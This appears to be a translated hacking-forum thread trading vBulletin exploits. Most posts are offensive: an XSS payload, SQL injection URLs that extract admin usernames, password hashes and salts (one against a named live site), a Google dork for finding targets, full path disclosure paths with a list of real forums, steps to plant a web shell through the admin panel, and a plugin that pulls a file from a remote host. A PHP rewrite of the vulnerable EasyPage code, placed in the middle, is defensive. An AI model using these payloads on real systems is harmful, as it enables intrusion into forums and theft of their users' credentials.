Let me correct you: "Управление" (Management). Maybe they just removed the footer, for security reasons.. otherwise, go to a user's profile -> edit, and the admin panel will open (if it is set up in config.php), or try issuing an infraction, and the mod panel will open.. (only I don't know whether you can get any further with the mod panel)
vBulletin 4.1.10 Full Path Disclosure [Info]

# Author: linc0ln.dll
# Exploit Title: vBulletin 4.1.10 Full Path Disclosure
# Date: 16/01/2012
# Vendor or Software Link: http://www.vbulletin.com/
# Category: WebApp
# Version: 4.1.10
# Contact: [email protected]
# Website: linc6.wordpress.com
# Greetings to: Mario_Vs | fir3 | fight3r | artii2 | pok3 | Upgreydd | VoltroN | amiugly | b00y4k4

[Vulnerability]
# Full Path Disclosure: demo
Stored XSS. All versions are vulnerable. Moderator rights required.
Go to Moderator panel -> Section management -> Announcement [Edit].
Working example (functionality check). Exploitation is the usual.
There is an SQL injection in 4.1.4 as well. Look at Patchlevel in vbulletin_global.js. If it just says "Vbulletin 4.1.4", rejoice. But if "Patchlevel n" is written next to it, you can look for other methods.
vBulletin 4.1.7 => 4.1.10 XSS Vulnerability

Vulnerability:
1. Send New Private Message > Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)

Watch the video: [http://vimeo.com/39049790]
1337day.com/exploits/17824
No problem, let's go.

EasyPage SQL-Injection

Google Dork: intext:"vbulletin" inurl:"page.php?p=" [Result: 18 000]

File: /page.php
PHP:
[...]
$pageid = $_REQUEST['p'];
[...]
$page = $vbulletin->db->query_first("
    SELECT * FROM " . TABLE_PREFIX . "easy_pages
    WHERE varname = '$pageid'
    LIMIT 1
");
[...]

PoC:
http://stavropolregion.com/page.php?p=stavrop%27%20and%201=2%20union%20select%201,2,3,%28select+concat_ws%280x3b,username,password,salt%29+from+user+where+usergroupid=6%20limit%201%29,5%20--%20f

File: /admincp/easy_pages_admin.php
PHP:
[...]
if ($_REQUEST['do'] == 'edit') {
    $pageid = $_REQUEST['pageid'];
    $page = $db->query_first("
        SELECT * FROM " . TABLE_PREFIX . "easy_pages
        WHERE pageid = $pageid
        LIMIT 1
    ");
[...]

PHP:
[...]
if ($_REQUEST['do'] == 'edit_update'){
    $title = addslashes($_POST['title']);
    $varname = addslashes($_POST['varname']);
    $content = addslashes($_POST['content']);
    $vbulletin->db->query_write("UPDATE " . TABLE_PREFIX . "easy_pages SET title = '$title', varname = '$varname', content = '$content', table_wrap = '" . $_POST['table_wrap'] . "' WHERE pageid = " . $_POST[pageid] . "; ");
    print_cp_redirect('easy_pages_admin.php');
}
[...]

PHP:
[...]
if ($_REQUEST['do'] == 'add_update'){
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $varname = addslashes($_POST['varname']);
    $vbulletin->db->query_write("INSERT INTO " . TABLE_PREFIX . "easy_pages SET title = '$title', varname = '$varname', content = '$content', table_wrap = '" . $_POST['table_wrap'] . "' ");
    print_cp_redirect('easy_pages_admin.php');
}
[...]

PHP:
[...]
if ($_REQUEST['do'] == 'delete_page'){
    $vbulletin->db->query_write("DELETE FROM " . TABLE_PREFIX . "easy_pages WHERE pageid = '" . $_REQUEST['pageid'] . "' LIMIT 1");
    print_cp_redirect('easy_pages_admin.php');
}
[...]

Successfully found (c) Boolean, 0x0000ed.com, 2012.
Successfully taken (c) Grabberz.com
vBulletin 3.8.x
PHP:
$ibforums->input['s_id'] = ibp_cleansql( $ibforums->input['s_id'] );
Path disclosure
Path disclosure in the latest version (4.2.0). Requires at least moderator rights.
Code:
http://localhost/modcp/index.php?do[]=head
https://localhost/modcp/index.php?do[]=home
Uploading a shell in 4.0.7, give or take. Requires admin panel access.
HTML:
Go to the admin panel: Products & Modules -> Save/Load modules.
Choose the shell plugin (attached below). Install it.
Go to Paid Subscriptions -> Subscription Management.
http://www.sendspace.com/file/rz0609
vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability

# Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection Vulnerability
# Google Dork: No Dork
# Date: 19/10/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://hoiquantinhoc.com
# Software Link: http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html
# Version: vBulletin 3 & 4
# Tested on: Windows 7
# CVE : http://www.vbulletin.com/
#
##############################################################################################
Vulnerability:
##############################################################################################
SQL Injection was found in ChangUonDyU Advanced Statistics. Query on ajax.php
##############################################################################################
Exploitation:
##############################################################################################
ajax.php?do=inforum&listforumid=100) UNION SELECT 1,concat_ws(0x7c,user(),database(),version()),3,4,5,6,7,8,9,10-- -&result=20
or:
ajax.php?do=inforum&listforumid=100) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user where userid=1-- -&result=20
##############################################################################################
Ex:
##############################################################################################
http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20
##############################################################################################
More Details:
##############################################################################################
Website: http://junookyo.blogspot.com/
About Exploit: http://junookyo.blogspot.com/2012/10/vbb-changuondyu-advanced-statistics-sql.html
##############################################################################################
Great thanks to James, Juno_okyo & J2TeaM, VNHack Group
##############################################################################################
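The EasyPage code quoted a few posts up and the ChangUonDyU ajax.php query in this post share one root cause: a request parameter (p, pageid, listforumid) is concatenated into SQL without being typed or escaped. What follows is an added example, not code from this thread, from EasyPage, from ChangUonDyU or from vBulletin itself, showing the EasyPage handlers rewritten with vBulletin's own input-cleaning API (clean_gpc / clean_array_gpc with TYPE_STR and TYPE_UINT, plus escape_string). The same TYPE_UINT treatment is what an integer parameter such as listforumid needs; that add-on's source is not shown in the thread, so it is not rewritten here. It assumes the normal vBulletin 3.x/4.x bootstrap ($vbulletin, TABLE_PREFIX, print_cp_redirect, print_no_permission) is loaded, and it assumes table_wrap is stored as a 0/1 flag.

```php
<?php
// Added example (not from this thread, from EasyPage or from vBulletin): the EasyPage
// handlers quoted earlier, rewritten with vBulletin's input-cleaning API.
// Assumes the normal vBulletin 3.x/4.x bootstrap has run (global.php for page.php,
// admincp/global.php for the admin script), so $vbulletin, TABLE_PREFIX,
// print_cp_redirect() and print_no_permission() exist.

// ---- /page.php -------------------------------------------------------------
// 'p' is the varname, a string: clean it as TYPE_STR and escape it in the query.
// The original put $_REQUEST['p'] unescaped inside the quotes, which is what the
// ' and 1=2 union select ... payload quoted in the thread abuses.
$vbulletin->input->clean_gpc('r', 'p', TYPE_STR);

$page = $vbulletin->db->query_first("
    SELECT * FROM " . TABLE_PREFIX . "easy_pages
    WHERE varname = '" . $vbulletin->db->escape_string($vbulletin->GPC['p']) . "'
    LIMIT 1
");

if (!$page)
{
    // unknown page: fail closed instead of echoing the raw parameter anywhere
    print_no_permission();
}

// ---- /admincp/easy_pages_admin.php -----------------------------------------
// pageid is an integer: TYPE_UINT turns any non-numeric input into 0, so the
// value can be used unquoted. An integer forum id parameter gets the same treatment.
$vbulletin->input->clean_array_gpc('r', array(
    'do'     => TYPE_STR,
    'pageid' => TYPE_UINT,
));
$vbulletin->input->clean_array_gpc('p', array(
    'title'      => TYPE_STR,
    'varname'    => TYPE_STR,
    'content'    => TYPE_STR,
    'table_wrap' => TYPE_BOOL,   // assumption: the column is a 0/1 flag
));

$db = $vbulletin->db;   // the original admin code used $db for the same object

if ($vbulletin->GPC['do'] == 'edit')
{
    $page = $db->query_first("
        SELECT * FROM " . TABLE_PREFIX . "easy_pages
        WHERE pageid = " . $vbulletin->GPC['pageid'] . "
        LIMIT 1
    ");
}

if ($vbulletin->GPC['do'] == 'edit_update')
{
    // every string goes through escape_string and every number through the typed
    // GPC value; the original applied addslashes() to three fields and left
    // table_wrap and pageid raw
    $db->query_write("
        UPDATE " . TABLE_PREFIX . "easy_pages SET
            title      = '" . $db->escape_string($vbulletin->GPC['title']) . "',
            varname    = '" . $db->escape_string($vbulletin->GPC['varname']) . "',
            content    = '" . $db->escape_string($vbulletin->GPC['content']) . "',
            table_wrap = " . intval($vbulletin->GPC['table_wrap']) . "
        WHERE pageid = " . $vbulletin->GPC['pageid'] . "
    ");
    print_cp_redirect('easy_pages_admin.php');
}

if ($vbulletin->GPC['do'] == 'add_update')
{
    $db->query_write("
        INSERT INTO " . TABLE_PREFIX . "easy_pages SET
            title      = '" . $db->escape_string($vbulletin->GPC['title']) . "',
            varname    = '" . $db->escape_string($vbulletin->GPC['varname']) . "',
            content    = '" . $db->escape_string($vbulletin->GPC['content']) . "',
            table_wrap = " . intval($vbulletin->GPC['table_wrap']) . "
    ");
    print_cp_redirect('easy_pages_admin.php');
}

if ($vbulletin->GPC['do'] == 'delete_page')
{
    $db->query_write("
        DELETE FROM " . TABLE_PREFIX . "easy_pages
        WHERE pageid = " . $vbulletin->GPC['pageid'] . "
        LIMIT 1
    ");
    print_cp_redirect('easy_pages_admin.php');
}
```

The point of declaring the type up front is that the fix no longer depends on remembering to escape at every use site: a value like the "100) UNION SELECT ..." listforumid from this post collapses to 100 under TYPE_UINT before any query is built, and a varname that contains a quote is escaped by the database layer rather than by a hand-written addslashes() that, as the original add_update handler shows, is easy to apply to some fields and forget on others.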
vBulletin 4.2.0 Full Path Disclosure Vulnerability
Code:
The Full Path Disclosure is in vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the time it is the same) the cpanel's username.
To see it go to: http://[path]/forumrunner/include/album.php
It works in 90% of the forums.
Example:
http://www.mgcproducts.com/forumrunner/include/album.php
http://atheistdiscussion.com/forumrunner/include/album.php
http://apolyton.net/forumrunner/include/album.php
http://www.romaniancommunity.net/forumrunner/include/album.php
http://www.ghosthax.com/forumrunner/include/album.php
http://www.reddotcity.net/forumrunner/include/album.php
http://www.sevenskins.com/forum/forumrunner/include/album.php
http://www.purevb.com/forumrunner/include/album.php
http://forum.hackersbrasil.com.br/forumrunner/include/album.php

vBulletin 4.x/5.x multiple Full Path Disclosure Vuln
Code:
/includes/api/commonwhitelist_2.php
/includes/api/commonwhitelist_5.php
/includes/api/commonwhitelist_6.php
/includes/api/1/album_album.php
/includes/api/1/album_editalbum.php
/includes/api/1/album_latest.php
/includes/api/1/album_overview.php
/includes/api/1/album_picture.php
/includes/api/1/album_user.php
/includes/api/1/announcement_edit.php
/includes/api/1/announcement_view.php
/includes/api/1/api_cmscategorylist.php
/includes/api/1/api_cmssectionlist.php
/includes/api/1/api_forumlist.php
/includes/api/1/api_getnewtop.php
/includes/api/1/api_getsecuritytoken.php
/includes/api/1/api_getsessionhash.php
/includes/api/1/api_init.php
/includes/api/1/api_mobilepublisher.php
/includes/api/1/api_usersearch.php
/includes/api/1/blog_blog.php
/includes/api/1/blog_bloglist.php
/includes/api/1/blog_comments.php
/includes/api/1/blog_custompage.php
/includes/api/1/blog_dosendtofriend.php
/includes/api/1/blog_list.php
/includes/api/1/blog_members.php
/includes/api/1/blog_post_comment.php
/includes/api/1/blog_post_editblog.php
/includes/api/1/blog_post_editcomment.php
/includes/api/1/blog_post_edittrackback.php
/includes/api/1/blog_post_newblog.php
/includes/api/1/blog_post_postcomment.php
/includes/api/1/blog_post_updateblog.php
/includes/api/1/blog_sendtofriend.php
/includes/api/1/blog_subscription_entrylist.php
/includes/api/1/blog_subscription_userlist.php
/includes/api/1/blog_usercp_addcat.php
/includes/api/1/blog_usercp_editcat.php
/includes/api/1/blog_usercp_editoptions.php
/includes/api/1/blog_usercp_editprofile.php
/includes/api/1/blog_usercp_modifycat.php
/includes/api/1/blog_usercp_updateprofile.php
/includes/api/1/editpost_editpost.php
/includes/api/1/editpost_updatepost.php
/includes/api/1/forum.php
/includes/api/1/forumdisplay.php
/includes/api/1/inlinemod_domergeposts.php
/includes/api/1/list.php
/includes/api/1/login_lostpw.php
/includes/api/1/member.php
/includes/api/1/memberlist_search.php
/includes/api/1/misc_showattachments.php
/includes/api/1/misc_whoposted.php
/includes/api/1/newreply_newreply.php
/includes/api/1/newreply_postreply.php
/includes/api/1/newthread_postthread.php
/includes/api/1/newthread_newthread.php
/includes/api/1/poll_newpoll.php
/includes/api/1/poll_polledit.php
/includes/api/1/poll_showresults.php
/includes/api/1/private_editfolders.php
/includes/api/1/private_insertpm.php
/includes/api/1/private_messagelist.php
/includes/api/1/private_newpm.php
/includes/api/1/private_showpm.php
/includes/api/1/private_trackpm.php
/includes/api/1/profile_editattachments.php
/includes/api/1/profile_editoptions.php
/includes/api/1/profile_editprofile.php
/includes/api/1/register_addmember.php
/includes/api/1/register_checkdate.php
/includes/api/1/search_process.php
/includes/api/1/search_showresults.php
/includes/api/1/showthread.php
/includes/api/1/subscription_addsubscription.php
/includes/api/1/subscription_editfolders.php
/includes/api/1/subscription_viewsubscription.php
/includes/api/1/threadtag_managetags.php
/includes/api/2/album_picture.php
/includes/api/2/api_blogcategorylist.php
/includes/api/2/blog_blog.php
/includes/api/2/blog_bloglist.php
/includes/api/2/blog_list.php
/includes/api/2/blog_subscription_entrylist.php
/includes/api/2/blog_subscription_userlist.php
/includes/api/2/blog_usercp_groups.php
/includes/api/2/content.php
/includes/api/2/editpost_editpost.php
/includes/api/2/forumdisplay.php
/includes/api/2/member.php
/includes/api/2/newreply_newreply.php
/includes/api/2/forum.php
/includes/api/2/poll_newpoll.php
/includes/api/2/poll_polledit.php
/includes/api/2/poll_showresults.php
/includes/api/2/private_messagelist.php
/includes/api/2/private_trackpm.php
/includes/api/2/profile_editattachments.php
/includes/api/2/search_showresults.php
/includes/api/2/showthread.php
/includes/api/3/api_gotonewpost.php
/includes/api/4/album_user.php
/includes/api/4/api_forumlist.php
/includes/api/4/api_getnewtop.php
/includes/api/4/breadcrumbs_create.php
/includes/api/4/facebook_getforumid.php
/includes/api/4/facebook_getnewforummembers.php
/includes/api/4/get_vbfromfacebook.php
/includes/api/4/login_facebook.php
/includes/api/4/newreply_postreply.php
/includes/api/4/newthread_postthread.php
/includes/api/4/register.php
/includes/api/4/register_addmember.php
/includes/api/4/search_findusers.php
/includes/api/4/subscription_viewsubscription.php
/includes/api/5/api_init.php
/includes/api/6/api_getnewtop.php
/includes/api/6/api_gotonewpost.php
/includes/api/6/content.php
/includes/api/6/member.php
/includes/api/6/newthread_newthread.php
/includes/block/blogentries.php
/includes/block/cmsarticles.php
/includes/block/html.php
/includes/block/newposts.php
/includes/block/sgdiscussions.php
/includes/block/tagcloud.php
/includes/block/threads.php
/forumrunner/include/subscriptions.php
/forumrunner/include/search_forum.php
/forumrunner/include/profile.php
/forumrunner/include/post.php
/forumrunner/include/pms.php
/forumrunner/include/online.php
/forumrunner/include/moderation.php
/forumrunner/include/misc.php
/forumrunner/include/login.php
/forumrunner/include/get_thread.php
/forumrunner/include/get_forum.php
/forumrunner/include/cms.php
/forumrunner/include/attach.php
/forumrunner/include/announcement.php
/forumrunner/include/album.php
/forumrunner/support/vbulletin_methods.php
/forumrunner/support/stringparser_bbcode.class.php
/forumrunner/support/utils.php
/forumrunner/support/other_methods.php
/packages/skimlinks/hooks/postbit_display_complete.php
/packages/skimlinks/hooks/showthread_complete.php
/packages/skimlinks/hooks/userdata_start.php
//...Leaked bY beBoss..//
I've run into this crap. I worked around it by changing the plugin to one of the index ones that fires when entering the forum, and as the PHP code I put not the retrieval of commands via GPC but copying a file from a remote host into the needed folder.